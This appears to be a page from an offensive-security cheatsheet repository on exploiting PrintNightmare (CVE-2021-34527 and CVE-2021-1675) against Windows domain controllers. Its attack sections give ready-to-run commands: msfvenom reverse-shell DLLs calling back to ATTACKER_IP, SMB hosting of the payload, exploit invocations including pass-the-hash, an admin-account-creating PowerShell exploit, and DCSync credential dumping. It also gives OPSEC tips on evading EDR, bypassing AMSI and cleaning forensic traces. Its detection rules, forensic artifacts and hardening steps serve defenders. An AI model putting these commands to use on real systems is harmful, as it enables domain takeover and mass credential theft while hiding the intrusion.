daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-43-printnightmare-cve-2021-34527.md (22688B)


      1 ---
      2 title: "Attack #43 β€” PrintNightmare (CVE-2021-34527)"
      3 description: "PrintNightmare is a critical RCE vulnerability in the Windows Print Spooler service that allows an authenticated user to execute arbitrary code as SYSTEM…"
      4 category: active-directory
      5 subcategory: "Domain Controller Attacks"
      6 tags: ["active-directory", "credential-access", "privilege-escalation"]
      7 tools: ["Impacket", "Mimikatz", "Metasploit", "Meterpreter", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/πŸ”΅ Attack #43 β€” PrintNightmare (CVE-2021-34527).md"
     11 ---
     12 # πŸ”΅ Attack #43 β€” PrintNightmare (CVE-2021-34527)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 PrintNightmare is a **critical RCE vulnerability** in the Windows Print Spooler service that allows an authenticated user to execute arbitrary code as SYSTEM on any Windows machine with the Print Spooler running β€” including Domain Controllers. The vulnerability exists in the `RpcAddPrinterDriverEx` function, which doesn't properly validate the caller's permissions before loading a DLL.
     19 
     20 > [!info]+ Technical Deep-Dive β€” RpcAddPrinterDriverEx Privilege Bypass
     21 > 1. The [Windows Print Spooler](https://learn.microsoft.com/en-us/windows/win32/printdocs/print-spooler) exposes `RpcAddPrinterDriverEx` (MS-RPRN OpNum 89) to allow remote printer driver installation
     22 > 2. The function accepts a `DRIVER_INFO_2` structure containing the path to a DLL file β€” intended to be a legitimate printer driver
     23 > 3. **The vulnerability**: The function checks `SeLoadDriverPrivilege` but the check is **bypassable** β€” any authenticated user can call the function when `APD_INSTALL_WARNED_DRIVER` (0x8000) flag is set
     24 > 4. The attacker hosts a malicious DLL on an SMB share accessible from the target
     25 > 5. The target's Print Spooler service loads the DLL **as SYSTEM** β€” executing arbitrary code with the highest privileges
     26 > 6. *On a DC, SYSTEM-level execution β†’ DCSync (Attack #37) β†’ full domain compromise*
     27 
     28 > [!important]+ Two CVEs β€” RCE vs LPE
     29 > `fas:TriangleExclamation`
     30 > 1. **CVE-2021-1675** (June 2021) β€” Originally classified as **Local Privilege Escalation (LPE)** only; patched in June 2021 Patch Tuesday
     31 > 2. **CVE-2021-34527** (July 2021) β€” The **Remote Code Execution (RCE)** variant; the June patch was incomplete and didn't fix the remote vector
     32 > 3. Both exploit the same underlying issue in `RpcAddPrinterDriverEx` but via different attack paths:
     33 >    - **LPE (CVE-2021-1675)**: Load malicious DLL from a local path β†’ SYSTEM on the local machine
     34 >    - **RCE (CVE-2021-34527)**: Load malicious DLL from a remote SMB share β†’ SYSTEM on the remote machine
     35 > 4. *The July 2021 out-of-band patch (KB5004945) addresses the RCE vector; additional hardening (Point and Print restrictions) was added in August 2021*
     36 
     37 ***
     38 
     39 ## βš™οΈ Prerequisites
     40 
     41 | Requirement | Detail |
     42 |---|---|
     43 | **Any domain user credentials** | Authentication required (any domain user, no admin needed) |
     44 | **Print Spooler running on target** | Default enabled on all Windows machines |
     45 | **Target is unpatched** | RCE patched July 2021 (KB5004945); LPE patched June 2021 |
     46 | **SMB share accessible** (RCE) | Attacker must host a DLL on an SMB share reachable from the target |
     47 | **Local file path** (LPE) | For the LPE variant, DLL must be on the local filesystem |
     48 
     49 ***
     50 
     51 ## πŸ› οΈ Tools
     52 
     53 | Tool | Platform | Version | Notes |
     54 |---|---|---|---|
     55 | [CVE-2021-1675.py](https://github.com/cube0x0/CVE-2021-1675) | Linux/Python | cube0x0's fork of Impacket | RCE exploit β€” requires modified Impacket |
     56 | [printnightmare.py](https://github.com/cube0x0/CVE-2021-1675) | Linux/Python | Python 3 | Alternative script name for the same exploit |
     57 | [SharpPrintNightmare](https://github.com/cube0x0/SharpPrintNightmare) | Windows (.NET) | Latest | C# exploit for C2 `execute-assembly` β€” both LPE and RCE |
     58 | [CVE-2021-1675.ps1](https://github.com/calebstewart/CVE-2021-1675) | Windows/PowerShell | Latest | PowerShell LPE exploit (`Invoke-Nightmare`) β€” creates local admin user |
     59 | [Impacket β€” smbserver.py](https://github.com/fortra/impacket) | Linux | β‰₯ 0.9.23 | Host malicious DLL on an SMB share |
     60 | [msfvenom](https://www.metasploit.com/) | Linux | Metasploit β‰₯ 6.0 | Generate malicious DLL payloads (reverse shell, adduser, etc.) |
     61 
     62 > [!tip]+ Impacket Version Note
     63 > `fas:Lightbulb`
     64 > 1. cube0x0's exploit requires a **modified version of Impacket** that supports `SMB_DIALECT_30` β€” the standard Impacket may fail with SMB3 negotiation errors
     65 > 2. Install from cube0x0's fork: `pip install git+https://github.com/cube0x0/impacket`
     66 > 3. Or use the standard Impacket with the `--no-smb3` flag if available in your exploit version
     67 > 4. *As of Impacket 0.12.0+, SMB3 support is native β€” the fork may no longer be necessary*
     68 
     69 ***
     70 
     71 ## ⏱️ Time-to-Execute Estimates
     72 
     73 | Operation | Time | Notes |
     74 |---|---|---|
     75 | DLL generation (msfvenom) | **5–10 seconds** | Quick payload compilation |
     76 | SMB server setup | **2–3 seconds** | Start smbserver.py |
     77 | RCE exploitation | **5–15 seconds** | DLL loads as SYSTEM; callback received |
     78 | LPE exploitation (PowerShell) | **3–10 seconds** | Local admin user created |
     79 | Full chain (exploit DC β†’ DCSync) | **30–60 seconds** | SYSTEM on DC β†’ immediate DCSync |
     80 
     81 ***
     82 
     83 ## πŸ’» Full Commands
     84 
     85 ### πŸ”΄ RCE β€” Remote Code Execution (CVE-2021-34527)
     86 
     87 ```bash
     88 # ── Step 1: Generate malicious DLL payload ────────────────────────────────────
     89 
     90 # Reverse shell DLL:
     91 msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 \
     92   -f dll -o evil.dll
     93 
     94 # Meterpreter DLL:
     95 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 \
     96   -f dll -o evil.dll
     97 
     98 # Add local admin user DLL (custom C code compiled):
     99 # The DLL's DllMain runs: net user hacker P@ss123! /add && net localgroup Administrators hacker /add
    100 ```
    101 
    102 ```bash
    103 # ── Step 2: Host malicious DLL on SMB share ───────────────────────────────────
    104 smbserver.py share /path/to/dll/ -smb2support
    105 # Share available at: \\ATTACKER_IP\share\evil.dll
    106 ```
    107 
    108 ```bash
    109 # ── Step 3: Exploit (cube0x0 β€” Impacket) ─────────────────────────────────────
    110 python3 CVE-2021-1675.py corp.local/low_user:'Password1'@DC01.corp.local \
    111   '\\ATTACKER_IP\share\evil.dll'
    112 # DLL executes as SYSTEM on DC01 β†’ reverse shell or local admin created
    113 
    114 # ── Alternative: printnightmare.py ────────────────────────────────────────────
    115 python3 printnightmare.py corp.local/low_user:'Password1'@DC01.corp.local \
    116   -dll '\\ATTACKER_IP\share\evil.dll'
    117 
    118 # ── With Pass-the-Hash ────────────────────────────────────────────────────────
    119 python3 CVE-2021-1675.py corp.local/low_user@DC01.corp.local \
    120   -hashes :aabbccdd11223344 '\\ATTACKER_IP\share\evil.dll'
    121 ```
    122 
    123 #### SharpPrintNightmare (C# β€” for C2)
    124 
    125 ```powershell
    126 # ── RCE variant via C2 execute-assembly ───────────────────────────────────────
    127 execute-assembly /path/to/SharpPrintNightmare.exe \\ATTACKER_IP\share\evil.dll \\DC01.corp.local
    128 
    129 # ── LPE variant (local priv esc on current machine) ──────────────────────────
    130 execute-assembly /path/to/SharpPrintNightmare.exe C:\Temp\evil.dll
    131 ```
    132 
    133 ### πŸ”΄ LPE β€” Local Privilege Escalation (CVE-2021-1675)
    134 
    135 ```powershell
    136 # ── PowerShell PoC (Invoke-Nightmare) ─────────────────────────────────────────
    137 Import-Module .\CVE-2021-1675.ps1
    138 Invoke-Nightmare -DriverName "Xerox" -NewUser "hacker" -NewPassword "P@ssword123!"
    139 # Creates local admin user "hacker" via Print Spooler exploitation
    140 # Runs entirely locally β€” no SMB share needed
    141 
    142 # ── Verify the user was created ───────────────────────────────────────────────
    143 net user hacker
    144 net localgroup Administrators
    145 ```
    146 
    147 ### πŸ”΄ Post-Exploitation (After SYSTEM on DC)
    148 
    149 ```bash
    150 # ── If you got a SYSTEM shell on a DC, immediately DCSync ─────────────────────
    151 # From the SYSTEM shell:
    152 mimikatz.exe
    153 privilege::debug
    154 lsadump::dcsync /domain:corp.local /all /csv
    155 
    156 # ── Or from Linux with the new local admin ────────────────────────────────────
    157 secretsdump.py corp.local/hacker:'P@ssword123!'@DC01.corp.local \
    158   -just-dc -outputfile domain_dump
    159 ```
    160 
    161 ***
    162 
    163 ## 🎯 OPSEC Tips
    164 
    165 1. **PrintNightmare exploitation is VERY noisy** β€” the DLL loading generates multiple events (driver installation, service creation, Sysmon image load) and most EDR solutions detect it immediately
    166 2. **Use the LPE variant for lateral movement** when you already have a foothold on a machine β€” it's less visible than remote RCE because no SMB share access is needed
    167 3. **The SMB share must be accessible from the target** β€” if outbound SMB is firewalled from the DC, the DLL can't be loaded; consider hosting on an already-compromised internal host
    168 4. **Custom DLLs are stealthier than msfvenom payloads** β€” msfvenom DLL signatures are well-known; compile a custom DLL with adduser or reverse shell code
    169 5. **Clean up after exploitation** β€” the printer driver and DLL persist on the target; remove them to reduce forensic evidence
    170 6. **Target workstations, not DCs, when possible** β€” exploiting a workstation is less monitored than a DC; then use lateral movement to reach the DC
    171 
    172 ### πŸ“Š OpSec Ranking
    173 
    174 | Method | Stealth | Speed | Reliability | Notes |
    175 |---|---|---|---|---|
    176 | LPE (PowerShell Invoke-Nightmare) | 🟑 Medium | 🟒 Fast | 🟒 High | Local only; detected by PowerShell logging |
    177 | RCE (cube0x0 + msfvenom DLL) | πŸ”΄ Low | 🟒 Fast | 🟑 Medium | SMB share + known DLL signature = easy detection |
    178 | RCE (custom compiled DLL) | 🟑 Medium | 🟒 Fast | 🟑 Medium | Better than msfvenom but driver install still logged |
    179 | SharpPrintNightmare (C2) | 🟑 Medium | 🟒 Fast | 🟑 Medium | In-memory execution avoids disk artifacts |
    180 
    181 ***
    182 
    183 ## πŸ›‘οΈ Detection β€” Event IDs
    184 
    185 | Event ID | Source | What to Look For |
    186 |---|---|---|
    187 | **808** | PrintService/Admin | Printer driver installation failed/suspicious β€” DLL load events from Print Spooler |
    188 | **316** | PowerShell | PowerShell script execution β€” `Invoke-Nightmare` or CVE-2021-1675.ps1 |
    189 | **7045** | System Log | New service/driver installed β€” Print Spooler loading a new "printer driver" |
    190 | **4688** | Security Log | Process creation from spoolsv.exe β€” child processes spawned by the malicious DLL |
    191 | **Sysmon 7** | Sysmon | Image loaded β€” DLL loaded by spoolsv.exe from non-standard path (SMB share or temp directory) |
    192 | **Sysmon 11** | Sysmon | File creation β€” DLL file written to `C:\Windows\System32\spool\drivers\x64\` |
    193 | **Sysmon 1** | Sysmon | Process creation β€” cmd.exe or powershell.exe spawned as child of spoolsv.exe |
    194 | **Sysmon 3** | Sysmon | Network connection β€” spoolsv.exe connecting to attacker SMB share |
    195 
    196 ### πŸ”Ž Sigma Rules
    197 
    198 ```yaml
    199 # ── SigmaHQ β€” PrintNightmare Exploitation (Spooler Child Process) ─────────────
    200 title: PrintNightmare Exploitation β€” Suspicious Spooler Child Process
    201 id: dca4d40b-printnight-spooler-child
    202 status: stable
    203 logsource:
    204   product: windows
    205   category: process_creation
    206 detection:
    207   selection:
    208     ParentImage|endswith: '\spoolsv.exe'
    209     Image|endswith:
    210       - '\cmd.exe'
    211       - '\powershell.exe'
    212       - '\pwsh.exe'
    213       - '\rundll32.exe'
    214       - '\net.exe'
    215       - '\net1.exe'
    216   condition: selection
    217 level: critical
    218 tags:
    219   - attack.execution
    220   - attack.t1210
    221   - cve.2021.34527
    222 ```
    223 
    224 ```yaml
    225 # ── SigmaHQ β€” Suspicious DLL Loaded by Spooler ───────────────────────────────
    226 title: DLL Loaded by Print Spooler from Non-Standard Path
    227 id: b5c6d7e8-spooler-dll-load
    228 logsource:
    229   product: windows
    230   category: image_load
    231 detection:
    232   selection:
    233     Image|endswith: '\spoolsv.exe'
    234   filter_legitimate:
    235     ImageLoaded|startswith:
    236       - 'C:\Windows\System32\'
    237       - 'C:\Windows\SysWOW64\'
    238   condition: selection and not filter_legitimate
    239 level: critical
    240 ```
    241 
    242 ### πŸ›‘οΈ EDR-Specific Detections
    243 
    244 > [!warning]+ Microsoft Defender for Identity (MDI) / Defender for Endpoint
    245 > 1. **"Suspicious printer driver installation"** β€” detects `RpcAddPrinterDriverEx` calls from non-admin users
    246 > 2. **"Suspicious DLL loading by spoolsv.exe"** β€” behavioral detection for Print Spooler loading DLLs from SMB shares or temp directories
    247 > 3. Defender for Endpoint has specific PrintNightmare detections that trigger on both the LPE and RCE variants
    248 > 4. *Microsoft considers this a high-priority detection β€” Defender updates within 24 hours of CVE disclosure included signatures*
    249 
    250 > [!warning]+ CrowdStrike Falcon
    251 > 1. **"PrintNightmare Exploitation Detected"** β€” high-fidelity behavioral detection for RpcAddPrinterDriverEx exploitation
    252 > 2. **"Malicious DLL Loaded by Spooler Service"** β€” monitors spoolsv.exe DLL loading from non-standard paths
    253 > 3. Process tree analysis: `spoolsv.exe β†’ cmd.exe` or `spoolsv.exe β†’ rundll32.exe` = critical alert
    254 
    255 > [!warning]+ Elastic Security
    256 > 1. Rule: **"PrintNightmare β€” Suspicious DLL Loaded by Spooler"** β€” Sysmon Event 7 correlation
    257 > 2. Rule: **"Suspicious Child Process of Spooler Service"** β€” process creation monitoring
    258 > 3. Rule: **"Remote Printer Driver Installation"** β€” network-level detection for remote `RpcAddPrinterDriverEx` calls
    259 
    260 ***
    261 
    262 ## πŸ”¬ Forensic Artifacts
    263 
    264 | Artifact | Location | Details |
    265 |---|---|---|
    266 | **Printer driver DLL** | `C:\Windows\System32\spool\drivers\x64\3\` | The malicious DLL is copied to the driver store β€” persists after exploitation |
    267 | **Event 808** | PrintService/Admin log | Driver installation event with DLL path |
    268 | **Event 7045** | System Log | New service/driver installed β€” includes driver name |
    269 | **spoolsv.exe child processes** | Event 4688 / Sysmon 1 | cmd.exe, powershell.exe, or other executables spawned by spoolsv.exe |
    270 | **SMB connection** | Sysmon 3 / network capture | spoolsv.exe connecting to attacker's SMB share to load the DLL |
    271 | **New local user** (LPE variant) | `net user` / SAM registry | If Invoke-Nightmare was used, a new local admin account exists |
    272 | **Prefetch** | `C:\Windows\Prefetch\` | SPOOLSV.EXE prefetch file shows loaded DLLs |
    273 | **Registry** | `HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\` | Driver registration entries |
    274 
    275 ***
    276 
    277 > [!important]+ Windows Server Version & Patch Timeline
    278 > 1. **June 2021 (KB5003637)**: CVE-2021-1675 patch β€” addresses LPE only; RCE still exploitable
    279 > 2. **July 2021 (KB5004945)**: Out-of-band emergency patch for CVE-2021-34527 β€” addresses RCE; but incomplete β€” researchers found bypasses
    280 > 3. **August 2021 (KB5005565)**: Additional hardening β€” `RestrictDriverInstallationToAdministrators` registry key; Point and Print restrictions
    281 > 4. **Server 2012 R2**: Vulnerable; patches available
    282 > 5. **Server 2016**: Vulnerable; patches available; `RestrictDriverInstallationToAdministrators` recommended
    283 > 6. **Server 2019**: Vulnerable; same patch timeline; CVE re-exploitable with Point and Print misconfiguration
    284 > 7. **Server 2022**: Shipped with fixes included; Point and Print restrictions enabled by default
    285 > 8. **Server 2025**: Print Spooler hardened; `RestrictDriverInstallationToAdministrators = 1` by default; Point and Print disabled by default
    286 > 9. *Multiple patch bypasses were discovered after each fix β€” the definitive mitigation is disabling Print Spooler on servers that don't need it*
    287 
    288 ***
    289 
    290 ## πŸ”’ Hardening & Prevention
    291 
    292 ```powershell
    293 # ── 1. Disable Print Spooler on DCs and servers (most effective) ──────────────
    294 Stop-Service -Name Spooler -Force
    295 Set-Service -Name Spooler -StartupType Disabled
    296 
    297 # ── 2. GPO β€” Disable Spooler on server OUs ───────────────────────────────────
    298 # Computer Configuration β†’ Policies β†’ Windows Settings β†’ Security Settings β†’
    299 # System Services β†’ Print Spooler β†’ Startup Type: Disabled
    300 
    301 # ── 3. Restrict printer driver installation to admins only ────────────────────
    302 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" `
    303   -Name "RestrictDriverInstallationToAdministrators" -Value 1 -Type DWord
    304 
    305 # ── 4. Disable Point and Print restrictions ───────────────────────────────────
    306 # GPO β†’ Computer Configuration β†’ Admin Templates β†’ Printers β†’
    307 # "Point and Print Restrictions" = Disabled
    308 # Or registry:
    309 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" `
    310   -Name "NoWarningNoElevationOnInstall" -Value 0 -Type DWord
    311 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" `
    312   -Name "UpdatePromptSettings" -Value 0 -Type DWord
    313 
    314 # ── 5. Restrict Point and Print to approved servers ──────────────────────────
    315 # GPO β†’ Computer Configuration β†’ Admin Templates β†’ Printers β†’
    316 # "Package Point and Print - Approved Servers" = Enabled
    317 # Server list: only legitimate print servers
    318 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" `
    319   -Name "PackagePointAndPrintServerList" -Value 1 -Type DWord
    320 
    321 # ── 6. Apply all patches ─────────────────────────────────────────────────────
    322 # June 2021: KB5003637 (LPE fix)
    323 # July 2021: KB5004945 (RCE fix)
    324 # August 2021: KB5005565 (hardening β€” Point and Print restrictions)
    325 # Verify: Get-HotFix | Where-Object { $_.HotFixID -match 'KB5004945|KB5005565' }
    326 
    327 # ── 7. Monitor spoolsv.exe for suspicious child processes ────────────────────
    328 # Sysmon config:
    329 # <ProcessCreate onmatch="include">
    330 #   <ParentImage condition="end with">spoolsv.exe</ParentImage>
    331 # </ProcessCreate>
    332 # <ImageLoad onmatch="include">
    333 #   <Image condition="end with">spoolsv.exe</Image>
    334 # </ImageLoad>
    335 ```
    336 
    337 ***
    338 
    339 ## 🧩 Troubleshooting
    340 
    341 | Error | Cause | Fix |
    342 |---|---|---|
    343 | `STATUS_ACCESS_DENIED` on exploit | Target is patched (July 2021+) | Verify patch status; if patched, this attack path is closed β€” try other escalation methods |
    344 | DLL not loading β€” `Path not found` | SMB share not accessible from target or wrong UNC path | Verify `\\ATTACKER_IP\share\evil.dll` is accessible; ensure `smbserver.py` is running with `-smb2support` |
    345 | Exploit succeeds but no callback | DLL payload issue or outbound connection blocked | Test DLL locally first; verify attacker listener is running; check firewall allows outbound from target |
    346 | `Invoke-Nightmare` fails with execution policy | PowerShell constrained language mode or AMSI | Bypass: `powershell -ep bypass`; for AMSI: use in-memory bypass or use the C# variant instead |
    347 | `cube0x0 exploit: SMB3 negotiation failed` | Standard Impacket doesn't support required SMB dialect | Install cube0x0's Impacket fork: `pip install git+https://github.com/cube0x0/impacket` |
    348 | DLL loads but crashes spoolsv.exe | DLL architecture mismatch (x86 vs x64) or bad DLL | Generate x64 DLL: `msfvenom -a x64 ...`; ensure DLL exports `DllMain` correctly |
    349 | Exploit works once but subsequent attempts fail | Spooler service crashed and hasn't restarted | Wait for auto-restart or manually restart: `sc \\DC01 start Spooler` (if you have access) |
    350 | Point and Print bypass doesn't work | August 2021 hardening applied correctly | `RestrictDriverInstallationToAdministrators = 1` blocks all bypasses β€” this attack path is fully closed |
    351 
    352 ***
    353 
    354 ## πŸ—ΊοΈ MITRE ATT&CK
    355 
    356 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups |
    357 |---|---|---|---|---|
    358 | **Privilege Escalation** | [T1068](https://attack.mitre.org/techniques/T1068/) | Exploitation for Privilege Escalation | LPE via CVE-2021-1675 β€” load malicious DLL as SYSTEM via Print Spooler | Multiple ransomware groups (Magniber, Vice Society) |
    359 | **Lateral Movement** | [T1210](https://attack.mitre.org/techniques/T1210/) | Exploitation of Remote Services | RCE via CVE-2021-34527 β€” remotely load DLL on target machine as SYSTEM | [Magniber ransomware](https://www.trendmicro.com/en_us/research/21/h/printnightmare-exploited-by-magniber-ransomware.html) |
    360 | **Execution** | [T1569](https://attack.mitre.org/techniques/T1569/) | [.002 β€” Service Execution](https://attack.mitre.org/techniques/T1569/002/) | Malicious DLL executed as a printer driver service by spoolsv.exe | Chained technique |
    361 
    362 > [!tip]+ Real-World Exploitation
    363 > `fas:Lightbulb`
    364 > 1. **Magniber ransomware** β€” One of the first ransomware families to incorporate PrintNightmare within weeks of disclosure; targeted South Korean organizations
    365 > 2. **Vice Society** β€” Used PrintNightmare for initial access and lateral movement in education sector attacks
    366 > 3. **CISA Alert AA21-179A** β€” Emergency alert warning of active PrintNightmare exploitation in the wild
    367 > 4. *PrintNightmare was weaponized faster than almost any other vulnerability in 2021 β€” within 48 hours of the PoC being accidentally published on GitHub, active exploitation was detected*
    368 
    369 ***
    370 
    371 ## πŸ”— Attack Chain Context
    372 
    373 ```
    374 [PrintNightmare] ──→ RCE as SYSTEM on any Windows host
    375          β”‚
    376          β”œβ”€β”€β†’ πŸ’₯ CVE-2021-34527 (RCE) + CVE-2021-1675 (LPE)
    377          β”œβ”€β”€β†’ πŸ”— On DC: SYSTEM β†’ DCSync (Attack #37) β†’ full domain compromise
    378          β”œβ”€β”€β†’ πŸ”— On workstation: SYSTEM β†’ credential dumping β†’ lateral movement
    379          β”œβ”€β”€β†’ πŸ”— Related: PrinterBug (Attack #42) β€” also Print Spooler, but coercion not RCE
    380          β”œβ”€β”€β†’ πŸ“‹ Multiple incomplete patches β†’ verify ALL patches + registry hardening
    381          └──→ πŸ’€ Defeated by: July 2021 patches + August 2021 hardening, disable Print Spooler
    382 ```
    383 
    384 ***
    385 
    386 > βœ… **Attack #43 β€” PrintNightmare complete.**